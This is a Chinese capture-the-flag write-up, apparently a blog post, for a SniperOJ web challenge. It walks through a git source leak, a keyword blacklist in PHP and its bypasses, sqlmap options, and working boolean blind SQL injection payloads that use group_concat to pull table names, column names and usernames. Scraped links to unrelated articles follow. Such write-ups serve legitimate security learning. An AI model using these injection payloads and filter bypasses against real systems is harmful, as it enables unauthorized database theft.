0x00 题目概况

题目地址:http://www.sniperoj.cn:10000/

这是一道注入题,存在git源码泄露,使用githack(freebuf有工具介绍)把源码脱下来,进行审计,然后注入。

挺简单的一道题,我自己卡一个地方卡了好久就是。

拖下来源码放在我服务器上,懒得拖想看看可以下载:

120.27.32.227/sniper.rar

大概分析如下:

敏感词过滤

$blacklist = array(" select "," union ","limit", " from ", "and","sleep");

foreach ($_POST as $key => $value) {

for ($i= 0;$i< count($blacklist); $i++){

if(strpos(strtolower($value), $blacklist[$i]) != false){

die("Come on inject me, you stupid srcipt kid!");

}

在注册页面:

// 判断用户是否存在

$sql_check = "SELECT userID from users where username = '$username'";

$result = $conn->query($sql_check);

if ($result->num_rows > 0) {

die("{\"status\":\"0\",\"msg\":\"用户名已存在\"}");

}

很明显的盲注点,在登录界面也有一个盲注点。(没发现哪里可以明注,本人新手还望赐教)

0x01 自己解题历程

1. 那个黑名单,“select”"union“” 可以使用内联注释绕过,或者使用其他如 /**/ 代替空格即可,and 可以用 && 代替,limit 没有找到方法绕过

2. 注入点  ,username 可以为:

' or 1 #

在 1 处进行盲注。

为真的关键词是 “用户名已存在”。

一看这么简单,加上最近深入了解了一下slqmap,所以想下直接用sqlmap跑就行。

sqlmap参数:  --string "用户名已存在" --suffix "#" --prefix " 'or " -v 3 --risk 3 --tamper space2comment.py

确实可以跑出来,但是,只能跑出数据库名,表名要靠碰撞,其他获取不到,很是困惑。

纠结了好一会,查看slqmap的payload才想起是 "limit" 在黑名单里面。

接下来就是怎么绕过limit限制的问题了。大体上思路有两种。

1. 不用limit ,寻找可以代替limit的关键字

2. 绕过限制,如编码绕过,内联注释绕过

找了挺久的资料,一无所获。没有找到mysql没有能代替limit的关键字,这里也绕过不了。

在网上看到一种这种绕过,在关键字中添加 注释   “/**/” ,如:sele/***/ct  。这是一种错误的方式,除非php会对  “/**/”进行过滤,否则,这种语句带入到数据库进行查询会报错的。

0x02 正确的思路:group_concat

大概自己思维还是太狭隘,一直在纠结怎么绕过limit ,想着盲注一定要有limit。

把源码挂在屏幕半天,偶然看自己的一下笔记才想起来使用 “group_concat”

个人对group_concat通俗理解:

进行查询,将多条查询结果以一行显示出来,即一条

如:select group_concat(username) from users

会将所有的username显示在一行

想到这,就没必要用limit 了。接下来就是写脚本的问题。

payload 如下:

获取表名:

' or ascii(substr(((select/**/group_concat(table_name)/**/from/**/information_schema.tables where table_schema=database()))from/**/1 for 1))=93 #

获取列名:

' or ascii(substr(((select/**/group_concat(column_name)/**/from/**/information_schema.columns where table_name=0x7573657273))from/**/2 for 1))=71 #

获取具体数据:

' or ascii(substr(((select/**/group_concat(username)/**/from/**/users))/**/from 2 for 1))=21 #

0x03 总结

git泄露

盲注不一定要使用 limit

记住 group_concat

使用sqlmap行不通时查看payload,别太依赖工具

题目挺简单的,自己太菜了,还要多学多看,这些远远不够

[SniperOJ](web)图书管理系统 注入 源码泄露的更多相关文章

  1. CTF中常见Web源码泄露总结

    目录00x1 .ng源码泄露 00x2  git源码泄露 00x3 .DS_Store文件泄漏 00x4 网站备份压缩文件 00x5 SVN导致文件泄露 00x6 WEB-INF/web.xml泄露  ...

  2. Web源码泄露总结

    Web源码泄露总结 背景 本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现. 源码泄漏分类 .hg源码泄漏 漏洞成因: hg init的时候会生成.hg e.g.http ...

  3. ctf/web源码泄露及利用办法

    和上一篇文章差不多,也算是对web源码泄露的一个总结,但是这篇文章更侧重于CTF 参考文章: https://blog.csdn.net/wy_97/article/details/78165051? ...

  4. 常见的Web源码泄露总结

    常见的Web源码泄露总结 源码泄露方式分类 .hg源码泄露 漏洞成因: hg init 的时候会生成 .hg 漏洞利用: 工具: dvcs-ripper .git源码泄露 漏洞成因: 在运行git i ...

  5. [WEB安全]源码泄露总结

    原文链接:https://blog.csdn.net/qq_36869808/article/details/88895109 源码泄露总结: svn源码泄露:https://blog.csdn.ne ...

  6. [web 安全] 源码泄露

    web 源码泄露 1..hg 源码泄露 http://www.example.com/.hg/ 2..git 源码泄露 http://www.example.com/.git/config 3..ds ...

  7. ctf常见源码泄露

    前言 在ctf中发现很多源码泄露的题,总结一下,对于网站的搭建要注意删除备份文件,和一些工具的使用如git,svn等等的规范使用,避免备份文件出现在公网 SVN源码泄露 原理 SVN(subversi ...

  8. XJar: Spring-Boot JAR 包加/解密工具,避免源码泄露以及反编译

    XJar: Spring-Boot JAR 包加/解密工具,避免源码泄露以及反编译 <?xml version="1.0" encoding="UTF-8" ...

  9. 放出一批学生管理系统jsp源码,部分有框架

    基于jsp+struts 2的学生管理系统eclipse - 源码码头   https://www.icodedock.com/article/25.html 基于jsp+mysql的JSP学生成绩管 ...

随机推荐

  1. Jetpack的ViewModel与LiveData

    本文基于SDK 29 一.ViewModel与LiveData的作用: 1.viewModel: 数据共享,屏幕旋转不丢失数据,并且在Activity与Fragment之间共享数据. 2.LiveDa ...

  2. suse 12 安装git客户端

    suse-linux:~ # zypper addrepo http://download.opensuse.org/repositories/devel:/tools:/scm/SLE_12_SP5 ...

  3. Linux 内存分析工具的命令大全介绍

    在Linux系统经常被用作服务器系统.当服务器内存吃紧的时候,free命令是我们最常使用的内存分析工具. free使用介绍# free命令可以显示Linux系统中空闲的.已用的物理内存及swap内存, ...

  4. jenkins发布代码选择不同分支

    jenkins上传代码分支以前都是用变量的方式,手动实现.过程就像这样 构建时候的界面就像下面这样,需要手动输入分支版本. 或者有固定的上线分支,用参数化构建 选项参数 来选择.总之这些方法比较传统, ...

  5. MyBatis分页插件PageHelper使用方法

    1.导入相关依赖坐标 <!-- MyBatis分页插件 --> <dependency> <groupId>com.github.pagehelper</gr ...

  6. Django视图与模板(6)

    前面记到数据库与模型(models)有联系,现在记录一下视图与模板,他们两个也有联系. 个人理解:视图就好像一个cpu,比较核心,就是用来处理问题的,又叫业务逻辑处理,他把处理完的结果插入到模板里面, ...

  7. Hadoop权威指南 - 学习笔记

    初识Hadoop.关于MapReduce Hadoop宏观介绍 相对于其他系统的优势 关系型数据库管理系统 为什么不能用配有大量硬盘的数据库进行大规模分析?为什么需要Hadoop? 因为计算机硬盘的发 ...

  8. linux下确认裸盘是否使用-渐入佳境

    --作者:飞翔的小胖猪 --创建时间:2021年3月9日 6.1 概述 在私有云和虚拟化环境中业务方经常会根据自己的业务情况申请磁盘用作数据存储用.如果申请了磁盘但没有使用的情况,将极大的造成资源的浪 ...

  9. Centos Linux下载rpm软件包(基础环境篇)-从零到无

    --时间:2020年10月23日 --作者:飞翔的小胖猪 一.概述 1.1  前言 很多生产环境往往是独立的一张网络不与互联网相通,经常会出现的问题就是应用在部署的时候无法安装配套的依赖包.导致很简单 ...

  10. 使用kind快速搭建本地k8s集群

    Kind是什么? k8s集群的组成比较复杂,如果纯手工部署的话易出错且时间成本高.而本文介绍的Kind工具,能够快速的建立起可用的k8s集群,降低初学者的学习门槛. Kind是Kubernetes I ...